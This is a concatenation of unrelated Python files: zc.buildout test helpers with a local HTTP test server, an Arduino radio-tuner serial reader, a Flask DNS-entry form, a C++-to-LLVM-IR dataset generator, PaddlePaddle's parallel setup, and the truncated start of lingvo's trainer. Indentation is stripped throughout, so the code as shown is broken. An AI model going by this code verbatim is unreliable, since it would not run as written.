def copy_coverage_files():
coveragedir = os.path.dirname(path_to_coveragerc)
import glob
for f in glob.glob('.coverage*'):
shutil.copy(f, coveragedir)
__tear_downs.insert(0, copy_coverage_files)
# Now we must modify the newly created bin/buildout to
# actually begin coverage.
with open('bin/buildout') as f:
import textwrap
lines = f.read().splitlines()
assert lines[1] == '', lines
lines[1] = 'import coverage; coverage.process_startup()'
with open('bin/buildout', 'w') as f:
f.write('\n'.join(lines))
def start_server(path):
port, thread = _start_server(path, name=path)
url = 'http://localhost:%s/' % port
register_teardown(lambda: stop_server(url, thread))
return url
cdpaths = []
def cd(*path):
path = os.path.join(*path)
cdpaths.append(os.path.abspath(os.getcwd()))
os.chdir(path)
def uncd():
os.chdir(cdpaths.pop())
test.globs.update(dict(
sample_buildout = sample,
ls = ls,
cat = cat,
mkdir = mkdir,
rmdir = rmdir,
remove = remove,
tmpdir = tmpdir,
write = write,
system = system,
get = get,
cd = cd, uncd = uncd,
join = os.path.join,
sdist = sdist,
bdist_egg = bdist_egg,
start_server = start_server,
stop_server = stop_server,
buildout = os.path.join(sample, 'bin', 'buildout'),
wait_until = wait_until,
print_ = print_,
clean_up_pyc = clean_up_pyc,
))
zc.buildout.easy_install.prefer_final(prefer_final)
def buildoutTearDown(test):
for f in test.globs['__tear_downs']:
f()
class Server(HTTPServer):
def __init__(self, tree, *args):
HTTPServer.__init__(self, *args)
self.tree = os.path.abspath(tree)
__run = True
def serve_forever(self):
while self.__run:
self.handle_request()
def handle_error(self, *_):
self.__run = False
class Handler(BaseHTTPRequestHandler):
Server.__log = False
def __init__(self, request, address, server):
self.__server = server
self.tree = server.tree
BaseHTTPRequestHandler.__init__(self, request, address, server)
def do_GET(self):
if '__stop__' in self.path:
self.__server.server_close()
raise SystemExit
def k():
self.send_response(200)
out = '<html><body>k</body></html>\n'.encode()
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
if self.path == '/enable_server_logging':
self.__server.__log = True
return k()
if self.path == '/disable_server_logging':
self.__server.__log = False
return k()
path = os.path.abspath(os.path.join(self.tree, *self.path.split('/')))
if not (
((path == self.tree) or path.startswith(self.tree+os.path.sep))
and
os.path.exists(path)
):
self.send_response(404, 'Not Found')
#self.send_response(200)
out = '<html><body>Not Found</body></html>'.encode()
#out = '\n'.join(self.tree, self.path, path)
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
return
self.send_response(200)
if os.path.isdir(path):
out = ['<html><body>\n']
names = sorted(os.listdir(path))
for name in names:
if os.path.isdir(os.path.join(path, name)):
name += '/'
out.append('<a href="%s">%s</a><br>\n' % (name, name))
out.append('</body></html>\n')
out = ''.join(out).encode()
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
else:
with open(path, 'rb') as f:
out = f.read()
self.send_header('Content-Length', len(out))
if path.endswith('.egg'):
self.send_header('Content-Type', 'application/zip')
elif path.endswith('.gz'):
self.send_header('Content-Type', 'application/x-gzip')
elif path.endswith('.zip'):
self.send_header('Content-Type', 'application/x-gzip')
else:
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
def log_request(self, code):
if self.__server.__log:
print_('%s %s %s' % (self.command, code, self.path))
def _run(tree, port):
server_address = ('localhost', port)
httpd = Server(tree, server_address, Handler)
httpd.serve_forever()
httpd.server_close()
def get_port():
for i in range(10):
port = random.randrange(20000, 30000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
try:
s.connect(('localhost', port))
except socket.error:
return port
finally:
s.close()
raise RuntimeError("Can't find port")
def _start_server(tree, name=''):
port = get_port()
thread = threading.Thread(target=_run, args=(tree, port), name=name)
thread.setDaemon(True)
thread.start()
wait(port, up=True)
return port, thread
def start_server(tree):
return _start_server(tree)[0]
def stop_server(url, thread=None):
try:
urlopen(url+'__stop__')
except Exception:
pass
if thread is not None:
thread.join() # wait for thread to stop
def wait(port, up):
addr = 'localhost', port
for i in range(120):
time.sleep(0.25)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(addr)
s.close()
if up:
break
except socket.error:
e = sys.exc_info()[1]
if e[0] not in (errno.ECONNREFUSED, errno.ECONNRESET):
raise
s.close()
if not up:
break
else:
if up:
raise
else:
raise SystemError("Couldn't stop server")
def install(project, destination):
if not isinstance(destination, str):
destination = os.path.join(destination.globs['sample_buildout'],
'eggs')
dist = pkg_resources.working_set.find(
pkg_resources.Requirement.parse(project))
if dist.location.endswith('.egg'):
destination = os.path.join(destination,
os.path.basename(dist.location),
)
if os.path.isdir(dist.location):
shutil.copytree(dist.location, destination)
else:
shutil.copyfile(dist.location, destination)
else:
# copy link
with open(os.path.join(destination, project+'.egg-link'), 'w') as f:
f.write(dist.location)
def install_develop(project, destination):
if not isinstance(destination, str):
destination = os.path.join(destination.globs['sample_buildout'],
'develop-eggs')
dist = pkg_resources.working_set.find(
pkg_resources.Requirement.parse(project))
with open(os.path.join(destination, project+'.egg-link'), 'w') as f:
f.write(dist.location)
def _normalize_path(match):
path = match.group(1)
if os.path.sep == '\\':
path = path.replace('\\\\', '/')
if path.startswith('\\'):
path = path[1:]
return '/' + path.replace(os.path.sep, '/')
normalize_path = (
re.compile(
r'''[^'" \t\n\r]+\%(sep)s_[Tt][Ee][Ss][Tt]_\%(sep)s([^"' \t\n\r]+)'''
% dict(sep=os.path.sep)),
_normalize_path,
)
normalize_endings = re.compile('\r\n'), '\n'
normalize_script = (
re.compile('(\n?)- ([a-zA-Z_.-]+)-script.py\n- \\2.exe\n'),
'\\1- \\2\n')
if sys.version_info > (2, ):
normalize___pycache__ = (
re.compile('(\n?)d __pycache__\n'), '\\1')
else:
normalize___pycache__ = (
re.compile(r'(\n?)- \S+\.pyc\n'), '\\1')
normalize_egg_py = (
re.compile(r'-py\d[.]\d(-\S+)?.egg'),
'-pyN.N.egg',
)
normalize_exception_type_for_python_2_and_3 = (
re.compile(r'^(\w+\.)*([A-Z][A-Za-z0-9]+Error: )'),
'\2')
not_found = (re.compile(r'Not found: [^\n]+/(\w|\.)+/\r?\n'), '')
# Setuptools now pulls in dependencies when installed.
adding_find_link = (re.compile(r"Adding find link '[^']+'"
r" from setuptools .*\r?\n"), '')
ignore_not_upgrading = (
re.compile(
'Not upgrading because not running a local buildout command.\n'
), '')
def run_buildout(command):
# Make sure we don't get .buildout
os.environ['HOME'] = os.path.join(os.getcwd(), 'home')
args = command.split()
import pkg_resources
buildout = pkg_resources.load_entry_point(
'zc.buildout', 'console_scripts', args[0])
buildout(args[1:])
def run_from_process(target, *args, **kw):
sys.stdout = sys.stderr = open('out', 'w')
target(*args, **kw)
def run_in_process(*args, **kwargs):
process = Process(target=run_from_process, args=args, kwargs=kwargs)
process.daemon = True
process.start()
process.join(99)
if process.is_alive() or process.exitcode:
with open('out') as f:
print(f.read())
def run_buildout_in_process(command='buildout'):
command = command.split(' ', 1)
command.insert(
1,
" use-dependency-links=false"
# Leaving this here so we can uncomment to see what's going on.
#" log-format=%(asctime)s____%(levelname)s_%(message)s -vvv"
" index=" + __file__ + 'nonexistent' # hide index
)
command = ' '.join(command)
run_in_process(run_buildout, command)
|
mySerial.py
|
import serial
import time
import threading
from myUtil import serialBaud, serialPort
from myUtil import MHz, kHz, minUkw, maxUkw, minKw, maxKw, minMw, maxMw, minLw, maxLw
from myUtil import minCap, maxCap
from myUtil import capToLw, capToMw, capToKw, capToUkw
from myLog import log, elog, slog
import myRadios
import myNoise
import statistics
currentDict = None
def getDict():
return currentDict
currentFreq = None
def getFreq():
return currentFreq
currentTuneFactor = None
def getTuneFactor():
return currentTuneFactor
currentRadio = None
serialObj = None
lastCaps = []
def parseSerial(line):
currentDict = {}
try:
line = line.decode("utf-8").strip()
segs = line.split("\t")
except UnicodeDecodeError as e:
# this typically happens when connection is started in the middle of a message
elog(e.reason)
return currentDict
try:
for seg in segs:
[key, val] = seg.split(":")
key = key.strip()
val = val.strip()
if key == "Cap":
val = float(val)
else:
val = int(val)
currentDict[key] = val
except ValueError as e:
elog("ValueError: {}".format(line))
return currentDict
def capToFreq(currentDict):
cap = currentDict["Cap"]
if currentDict["LW"] == 1:
return capToLw(cap)
elif currentDict["MW"] == 1:
return capToMw(cap)
elif currentDict["KW"] == 1:
return capToKw(cap)
elif currentDict["UKW"] == 1:
return capToUkw(cap)
return 0
def thread_run():
global currentDict
global lastCaps
global currentFreq
global currentRadio
global currentTuneFactor
global serialObj
modeDebounce = 0
while True:
if not serialObj or not serialObj.is_open:
serialObj = serial.Serial()
serialObj.port = serialPort
serialObj.baudrate = serialBaud
try:
serialObj.open()
slog("Connected to Arduino on {}".format(serialPort))
except serial.SerialException as e:
elog(e)
time.sleep(2)
else:
try:
line = serialObj.readline()
currentDict = parseSerial(line)
# log(currentDict)
except serial.SerialException as e:
serialObj.close() # close so that Linux can use the same /dev/ttyUSB*
elog(e)
time.sleep(2)
if "On" in currentDict and "LW" in currentDict and "MW" in currentDict and "KW" in currentDict and "UKW" in currentDict and "Vol" in currentDict and "Tre" in currentDict and "Cap" in currentDict:
# if valid data
# check how many band selectors are active
mode = currentDict["LW"] + currentDict["MW"] + currentDict["KW"] + currentDict["UKW"]
if mode == 1:
# normal mode
maxTuneFactor = 0
# iron out spikes in cap values
lastCaps = lastCaps[0:4]
lastCaps.insert(0, currentDict["Cap"])
currentDict["Cap"] = statistics.median(lastCaps)
currentFreq = capToFreq(currentDict)
isOn = currentDict["On"] == 1
vol = currentDict["Vol"] * 100 / 255 if isOn else 0
staticVol = vol
for radio in myRadios.getRadios():
tuneFactor = radio.tuneFactor(currentFreq)
maxTuneFactor = max(maxTuneFactor, tuneFactor)
# cross-over noise works as follows:
if tuneFactor == 0:
# full noise. no signal
radio.off()
staticVol = staticVol
else:
currentRadio = radio
if tuneFactor <= 0.5:
# full noise with a little bit of signal
myVol = tuneFactor * 2 * vol
staticVol = staticVol
elif tuneFactor < 1:
# full signal with a little bit of noise
myVol = vol
staticVol = (2 * (1 - tuneFactor)) * staticVol
else:
# full signal. no noise
myVol = vol
staticVol = 0
radio.setVolume(myVol)
myNoise.setVolume(staticVol)
currentTuneFactor = maxTuneFactor
elif mode == 0:
# if no channel is selected
# @TODO: maybe future use to calibrate the tuner or something
myNoise.setVolume(0)
if currentRadio != None:
currentRadio.off()
currentFreq = None
currentRadio = None
currentTuneFactor = None
if mode == 2:
# if: two buttons are pressed
modeDebounce += 1
if modeDebounce == 4 and currentRadio:
currentRadio.next()
else:
modeDebounce = 0
thread = threading.Thread(target=thread_run, daemon=True)
thread.name = "serial"
thread.start()
|
web.py
|
#!/usr/bin/env python
import re
import worker
import logging
import config as CFG
import sqlite3 as sql
import multiprocessing
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def home():
if request.method == 'POST':
username = request.form['username']
domain = request.form['domain']
cname = request.form['cname']
for i, each in enumerate((username, domain, cname)):
if i == 0:
if not is_valid(each, 1):
return render_template('index.html', submit=True,
error=True)
else:
if not is_valid(each):
return render_template('index.html', submit=True,
error=True)
conn = sql.connect(CFG.DB)
c = conn.cursor()
c.execute('insert into yodns (username, domain, cname) values (?,?,?)',
(username, domain, cname))
conn.commit()
conn.close()
return render_template('index.html', submit=True, error=False)
return render_template('index.html')
def is_valid(str, usr_flag=None):
regex = '^\w+$' if usr_flag else '^(\w+\.)?\w+\.\w+\.?$'
if len(str) > 50:
return False
return re.search(regex, str)
if __name__ == '__main__':
p = multiprocessing.Process(target=worker.worker)
p.start()
logging.basicConfig(filename='logs/server.log',
format='%(asctime)s - %(levelname)s - %(message)s',
level=logging.DEBUG)
app.run(host='0.0.0.0', port=CFG.PORT, use_reloader=False)
|
gen_dataset.py
|
import re
import os
import argparse
import queue
import subprocess
import clang.cindex as cind
import multiprocessing as mp
from cxxfilt import demangle, InvalidName
from random import sample
from itertools import product
from tempfile import TemporaryDirectory
from threading import Thread
def prepare_cpp(f_txt_path, f_cpp_path):
includes = "#include <bits/stdc++.h>\nusing namespace std;\n"
re_main = re.compile(r"main\s*\(")
re_void = re.compile(r"void\s+int main")
re_int = re.compile(r"int\s+int main")
with open(f_txt_path) as f_txt:
content = f_txt.read()
content = re.sub(re_main, "int main(", content, count=1)
content = re.sub(re_int, "int main", content, count=1)
content = re.sub(re_void, "int main", content, count=1)
with open(f_cpp_path, "w") as f_cpp:
f_cpp.write(includes)
f_cpp.write(content)
return 0
def compile(f_cpp_path, ir_per_file, compiler_flags):
compiler = ["g++", "clang++"]
olevel = ["-O0", "-O1", "-O2", "-O3", "-Os"]
fastmath = ["", "-ffast-math"]
native = ["", "-march=native"]
fpic = ["", "-fPIC"]
args = tuple(product(compiler, olevel, fastmath, native, fpic))
binaries = []
for i, additional_args in enumerate(sample(args, k=ir_per_file)):
f_bin_path = f"{f_cpp_path[:-4]}{i}"
if not subprocess.call(" ".join(additional_args) + f" {compiler_flags} {f_cpp_path} -o {f_bin_path}",
shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL):
binaries.append(f_bin_path)
return binaries
def lift(path_bin, path_ida, path_mcsema_lift, path_llvm_dis, mcsema_disas_timeout):
path_cfg, path_bc, path_ll = f"{path_bin}.cfg", f"{path_bin}.bc", f"{path_bin}.ll"
try:
ret_code = subprocess.call(f"wine {path_ida} -B -S\"{args['path_get_cfg']} --output {path_cfg} --arch amd64 "
f"--os linux --entrypoint main\" {path_bin}", shell=True,
timeout=mcsema_disas_timeout, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
if any((ret_code, not os.path.exists(path_cfg), not os.stat(path_cfg).st_size)):
return
except subprocess.TimeoutExpired:
return
if subprocess.call(f"{path_mcsema_lift} --output {path_bc} --arch amd64 --os linux --cfg {path_cfg}", shell=True,
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL):
return
if subprocess.call(f"{path_llvm_dis} {path_bc} -o {path_ll}", shell=True):
return
return path_ll if os.path.exists(path_ll) and os.stat(path_ll).st_size else None
def get_func_names_from_cpp(path):
index = cind.Index.create()
func_types = [cind.CursorKind.FUNCTION_DECL, cind.CursorKind.CXX_METHOD, cind.CursorKind.FUNCTION_TEMPLATE]
struct_types = [cind.CursorKind.CLASS_DECL, cind.CursorKind.STRUCT_DECL, cind.CursorKind.CLASS_TEMPLATE]
try:
translation_units = index.parse(path, args=["-O0"])
except cind.TranslationUnitLoadError:
return
q = queue.Queue()
for node in translation_units.cursor.get_children():
if node.kind in struct_types or node.kind in func_types:
q.put(node)
func_nodes = []
while not q.empty():
cur = q.get()
if cur.kind in func_types:
# skip functions from includes
if os.path.abspath(cur.location.file.name) != os.path.abspath(path):
continue
func_nodes.append(cur)
elif cur.kind in struct_types:
for node in cur.get_children():
q.put(node)
return set([f.spelling for f in func_nodes])
def store_funcs_from_ll(path_ll, funcs_from_cpp, path_dir, minlen):
re_func = re.compile(r"sub_[a-zA-Z0-9]+_(\w+)", re.ASCII)
with open(path_ll) as ll_file:
while True:
line = ll_file.readline()
if not line:
break
if line == "\n":
continue
tmp = line.split()
if tmp[0] != "define":
continue
else:
res_search = re.search(re_func, line)
if res_search:
try:
func_name = demangle(res_search.group(1)).split("(")[0]
except InvalidName:
continue
else:
continue
if func_name in funcs_from_cpp:
func_code = [line]
flen = 1
while True:
line = ll_file.readline()
func_code.append(line)
flen += 1
if line == "}\n":
break
if flen < minlen:
continue
with open(os.path.join(path_dir, f"{os.path.basename(path_ll[:-3])}_{func_name}.ll"),
"w") as f_func:
f_func.write("".join(func_code))
def process_class(q_in, args):
while not q_in.empty():
try:
cur_folder = q_in.get(timeout=1)
except queue.Empty:
break
c = int(os.path.basename(cur_folder))
print(f"Proccess {c} class")
for part in "train", "val", "test":
os.makedirs(os.path.join(os.path.join(args["path_out"], f"ir_{part}"), str(c)), exist_ok=True)
listing = [os.path.join(cur_folder, f) for f in os.listdir(cur_folder)]
num_success = 0
n1, n2, n3 = map(int, args["split_ratio"].split(":"))
s = n1 + n2 + n3
for f_txt_path in listing:
part = "train" if num_success % s < n1 else "val" if num_success % s < n1 + n2 else "test"
with TemporaryDirectory() as tempdir:
f_cpp_path = os.path.join(tempdir, f"{os.path.basename(f_txt_path)[:-4]}.cpp")
try:
prepare_cpp(f_txt_path, f_cpp_path)
except UnicodeDecodeError:
continue
funcs_from_cpp = get_func_names_from_cpp(f_cpp_path)
binaries = compile(f_cpp_path, args["ir_per_file"], args["compiler_flags"])
lifted = []
for bin in binaries:
path_ll = lift(bin, args["path_ida"], args["path_mcsema_lift"], args["path_llvm_dis"],
args["mcsema_disas_timeout"])
if path_ll:
lifted.append(path_ll)
for l in lifted:
store_funcs_from_ll(l, funcs_from_cpp, os.path.join(os.path.join(args["path_out"], f"ir_{part}"),
str(c)), args["llminlen"])
if lifted:
num_success += 1
if num_success == args["files_per_class"]:
break
def spawn_threads(q_in, args):
pool = [Thread(target=process_class, args=(q_in, args)) for _ in range(args["num_threads"])]
for t in pool:
t.start()
for t in pool:
t.join()
def main(args):
q_in = mp.Queue()
for f in [os.path.join(args["path_in"], str(c)) for c in range(1, args["num_classes"] + 1)]:
q_in.put(f)
pool = [mp.Process(target=spawn_threads, args=(q_in, args)) for _ in range(args["num_processes"])]
for p in pool:
p.start()
for p in pool:
p.join()
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--path-in", type=str, required=True)
parser.add_argument("--path-out", type=str, required=True)
parser.add_argument("--ir-per-file", type=int, default=8)
parser.add_argument("--files-per-class", type=int, default=400)
parser.add_argument("--compiler-flags", type=str, default="--no-warnings -std=c++11")
parser.add_argument("--path-ida", type=str, required=True, help="path to idat64.exe")
parser.add_argument("--path-get-cfg", type=str, required=True, help="path to get_cfg.py")
parser.add_argument("--path-llvm-dis", type=str, required=True)
parser.add_argument("--path-mcsema-lift", type=str, required=True)
parser.add_argument("--num-classes", type=int, default=104)
parser.add_argument("--num-threads", type=int, default=1)
parser.add_argument("--num-processes", type=int, default=1)
parser.add_argument("--mcsema-disas-timeout", type=int, default=120)
parser.add_argument("--split-ratio", type=str, default="13:3:4")
parser.add_argument("--llminlen", type=int, default=21)
args = parser.parse_args()
return vars(args)
if __name__ == "__main__":
args = parse_args()
main(args)
|
parallel.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except jin compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import warnings
from multiprocessing import Process, Manager
import time
import sys
from paddle import compat as cpt
# deprecated module import
from paddle.fluid import core
from paddle.fluid.framework import _set_expected_place
from paddle.fluid.dygraph import parallel_helper
from paddle.fluid.dygraph.parallel import ParallelEnv
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
__all__ = ["init_parallel_env"]
ParallelStrategy = core.ParallelStrategy
def _start_kv_server(port, http_server_d):
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(int(port))
http_server.start()
wait_seconds = 5
while http_server_d.get("running", False):
time.sleep(wait_seconds)
http_server.stop()
def init_parallel_env():
"""
Initialize parallel training environment in dynamic graph mode.
.. note::
Now only supports initializing the GPU parallel training
environment and using NCCL for communication.
Returns:
None
Examples:
.. code-block:: python
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear1 = nn.Linear(10, 10)
self._linear2 = nn.Linear(10, 1)
def forward(self, x):
return self._linear2(self._linear1(x))
def train():
# 1. enable dynamic mode
paddle.disable_static()
# 2. initialize parallel environment
dist.init_parallel_env()
# 3. create data parallel layer & optimizer
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.MSELoss()
adam = opt.Adam(
learning_rate=0.001, parameters=dp_layer.parameters())
# 4. run layer
inputs = paddle.randn([10, 10], 'float32')
outputs = dp_layer(inputs)
labels = paddle.randn([10, 1], 'float32')
loss = loss_fn(outputs, labels)
loss = dp_layer.scale_loss(loss)
loss.backward()
dp_layer.apply_collective_grads()
adam.step()
adam.clear_grad()
if __name__ == '__main__':
dist.spawn(train)
"""
# 1. gpu check
if not core.is_compiled_with_cuda():
raise NotImplementedError(
"Cannot initialize parallel environment in CPU-only version, now only "
"supports initializing the GPU parallel environment. Please recompile "
"or reinstall paddle with GPU support.")
# 2. check env
def _check_var_exists(var_name):
var = os.environ.get(var_name, None)
if var is None:
raise ValueError("paddle.distributed initialize error, "
"environment variable %s is needed, but not set." %
var_name)
_check_var_exists("FLAGS_selected_gpus")
_check_var_exists("PADDLE_TRAINER_ID")
_check_var_exists("PADDLE_CURRENT_ENDPOINT")
_check_var_exists("PADDLE_TRAINERS_NUM")
_check_var_exists("PADDLE_TRAINER_ENDPOINTS")
if ParallelEnv().world_size < 2:
return
# 3: init gloo context
ep_rank_0 = ParallelEnv().trainer_endpoints[0].split(":")
ep_rank = ParallelEnv().trainer_endpoints[ParallelEnv().rank].split(":")
manager = Manager()
# glboal dict to store status
http_server_d = manager.dict()
http_server_d["running"] = False
if ParallelEnv().rank == 0:
http_server = Process(
target=_start_kv_server, args=(int(ep_rank_0[1]), http_server_d))
http_server.daemon = True
http_server_d["running"] = True
http_server.start()
wait_server_ready([ParallelEnv().trainer_endpoints[0]])
gloo_strategy = core.GlooParallelStrategy()
gloo_strategy.rank = ParallelEnv().rank
gloo_strategy.rank_num = ParallelEnv().world_size
gloo_strategy.ip_address = ep_rank_0[0]
gloo_strategy.ip_port = int(ep_rank_0[1])
default_init_timeout_seconds = 3600
default_run_timeout_seconds = 9999999
gloo_strategy.init_seconds = default_init_timeout_seconds
gloo_strategy.run_seconds = default_run_timeout_seconds
gloo = core.GlooParallelContext(gloo_strategy)
gloo.init()
if ParallelEnv().rank == 0:
http_server_d["running"] = False
http_server.join()
# 4. init NCCL ParallelStrategy
strategy = ParallelStrategy()
if parallel_helper._is_parallel_ctx_initialized():
warnings.warn("The parallel environment has been initialized.")
strategy.nranks = ParallelEnv().world_size
strategy.local_rank = ParallelEnv().rank
strategy.trainer_endpoints = ParallelEnv().trainer_endpoints
strategy.current_endpoint = ParallelEnv().current_endpoint
# NOTE(chenweihang): [ why config global place here? ]
# the dygraph mode will be set to default mode,
# users will not call `dygraph.guard` or `enable_dygraph`
# directly, if they want to switch default place,
# they need to call a function to change default place,
# here just set correctly place to users
place = core.CUDAPlace(ParallelEnv().device_id)
_set_expected_place(place)
# init nccl context
parallel_helper._set_parallel_ctx(core.NCCLParallelContext(strategy, place))
parallel_helper._init_parallel_ctx()
def get_rank():
"""
Returns the rank of current trainer.
Its value is equal to the value of the environment variable ``PADDLE_TRAINER_ID`` .
The default value is 0.
Returns:
(int) The rank of current trainer.
Examples:
.. code-block:: python
import paddle
import paddle.distributed as dist
# execute this command in terminal: export PADDLE_TRAINER_ID=0
print("The rank is %d" % dist.get_rank())
# The rank is 0
"""
return ParallelEnv().rank
def get_world_size():
"""
Returns the number of trainers (number of processes participating in current job).
Its value is equal to the value of the environment variable ``PADDLE_TRAINERS_NUM`` .
The default value is 1.
Returns:
(int) The number of trainers.
Examples:
.. code-block:: python
import paddle
import paddle.distributed as dist
# execute this command in terminal: export PADDLE_TRAINERS_NUM=4
print("The world_size is %d" % dist.get_world_size())
# The world_size is 4
"""
return ParallelEnv().world_size
|
trainer.py
|
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Trainer.
To run locally:
.. code-block:: bash
$ bazel build -c opt //lingvo:trainer
$ bazel-bin/lingvo/trainer --logtostderr \
--model=image.mnist.LeNet5 --mode=sync --logdir=/tmp/lenet5 \
--run_locally=cpu
To use GPU, add `--config=cuda` to build command and set `--run_locally=gpu`.
"""
import contextlib
import os
import re
import sys
import threading
import time
from lingvo import base_trial
from lingvo import datasets
from lingvo import executor
from lingvo import model_imports
from lingvo import model_registry
from lingvo import pdb_wrapper
from lingvo import trainer_impl
from lingvo import trainer_utils # pylint: disable=unused-import
import lingvo.compat as tf
from lingvo.core import base_model
from lingvo.core import base_model_params
from lingvo.core import checkpointer
from lingvo.core import cluster_factory
from lingvo.core import inference_graph_exporter
from lingvo.core import metrics
from lingvo.core import py_utils
from lingvo.core import summary_utils
from lingvo.core import tpu_embedding_layers
import numpy as np
from lingvo import base_runner
from google.protobuf import text_format
# pylint:disable=g-direct-tensorflow-import
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.tpu import device_assignment as device_assignment_lib
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop as tpu_training_loop
from tensorflow.python.tpu.ops import tpu_ops
# pylint:enable=g-direct-tensorflow-import
tf.flags.DEFINE_bool(
'interactive', False,
'If True, enter interactive IPython for the controller job.')
tf.flags.DEFINE_string(
'run_locally', '',
'Can be empty, cpu, or gpu. If not empty, ignores cluster configuration '
'flags and runs controller and trainer in a single local process.')
tf.flags.DEFINE_string('tf_master', '', 'TF runtime.')
tf.flags.DEFINE_string(
'cluster_spec', '', 'A tf.train.ClusterSpec to override the master. '
'The dict is specified as: job=host1:port1,host2:port2,'
'host3:port3@job2=host3:port4,...')
tf.flags.DEFINE_string(
'mode',
'async', 'How this trainer binary is used. '
'async: used in an async training setup; '
'sync: used in a sync training setup; '
'shell: an interactive shell for development; '
'inspect_evaler: print evaler dataset names; '
'inspect_decoder: print decoder dataset names; '
'inspect_model: print the names and shapes of variables for this model; '
'inspect_params: print the model params corresponding to each dataset; '
'write_inference_graph: write inference graphs to logdir.',
allow_hide_cpp=True)
tf.flags.DEFINE_multi_string(
'inspect_model_part_regex', None,
'This argument is used to check the number of params in different part '
'of the model. (e.g. encoder or decoder or any specific layers of '
'encoder/decoder.) The value should be in the name:regex format. '
'For example, --inspect_model_part_regex=encoder:^.+conformer_encoder.+ '
'means any tensor\'s name matched with regex `^.+conformer_encoder.+` will '
'be counted as `encoder`, and the number of params in `encoder` will be '
'printed out when `inspect_model`. ')
tf.flags.DEFINE_integer('inspect_model_topn', 0,
'print `topn` tensors when inspec_model')
tf.flags.DEFINE_string('controller_job', '/job:controller', 'Job name.')
tf.flags.DEFINE_integer('controller_gpus', 0, 'Number of controller GPUs.')
tf.flags.DEFINE_integer('worker_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('worker_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_integer('worker_split_size', 1,
'Number of devices for one split.')
tf.flags.DEFINE_string('ps_job', '/job:ps', 'Job name')
tf.flags.DEFINE_integer('ps_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('ps_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('input_job', '/job:input', 'Job name')
tf.flags.DEFINE_integer('input_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_string(
'input_targets', '', 'Target network addresses for the '
'input job. E.g., a single ip:port, or a list of '
'comma-separated grpc://ip:port, etc.')
tf.flags.DEFINE_string('tf_data_service_address', '',
'The address of the tf.data service.')
tf.flags.DEFINE_string(
'inference_graph_filename', None,
'Output inference graph filename. If unspecified, output two inference '
'graphs, one for CPU and one for TPU using the default settings.')
tf.flags.DEFINE_string(
'inference_graph_device', None,
'Type of device the output inference graph is for. This flag is applicable '
'only when FLAGS.inference_graph_filename is specified.')
tf.flags.DEFINE_integer(
'inference_graph_random_seed', None,
'Random seed to fix when exporting inference graph. '
'Not fixed when set to None.')
tf.flags.DEFINE_list(
'graph_def_filename', [],
'Output inference graph_def filenames. Defaults to CPU graph if '
'inference_graph_filename and inference_graph_device are not specified.')
tf.flags.DEFINE_string(
'inference_dataset_name', 'Test',
'Name of the dataset whose params to be extracted inference graph with.')
tf.flags.DEFINE_bool(
'inference_gen_tpu_init_op', True,
'Whether the tpu_init_op subgraph is generated for TPU inference graph.')
tf.flags.DEFINE_bool(
'evaler_in_same_address_as_controller', False,
'Whether or not evaler is in the same address space as '
'controller. This flag is meant for unittest only.')
tf.flags.DEFINE_string(
'vizier_reporting_job', 'evaler',
'Job responsible for reporting metrics. This specifies a '
'job prefix, evaler will match all evaler jobs, while '
'evaler_dev and decoder_dev will only match the corresponding '
'jobs that are on the dev set.')
tf.flags.DEFINE_bool(
'add_summary', None,
'Whether we should output summaries. The default value "None", enables '
'summaries based on the job type.')
tf.flags.DEFINE_bool('disable_tf2', False,
'Whether run on Tensorflow without V2 behaviors.')
@tf.flags.validator('vizier_reporting_job')
def _ValidateVizierReportingJob(value):
if value in ['evaler', 'decoder']:
return True
if value.startswith('evaler_') or value.startswith('decoder_'):
return True
tf.logging.info('vizier_reporting_job should usually start with evaler or '
'decoder, unless in executor/program mode. '
f'vizier_reporting_job={value}')
return True
tf.flags.DEFINE_bool(
'checkpoint_in_trainer_tpu', False,
'Whether to enable checkpointing in TrainerTpu, allowing for '
'operation without a separate Controller task.'
'This flag also disables checkpointing from the Controller, '
'but still allows it to write summaries.')
tf.flags.DEFINE_string(
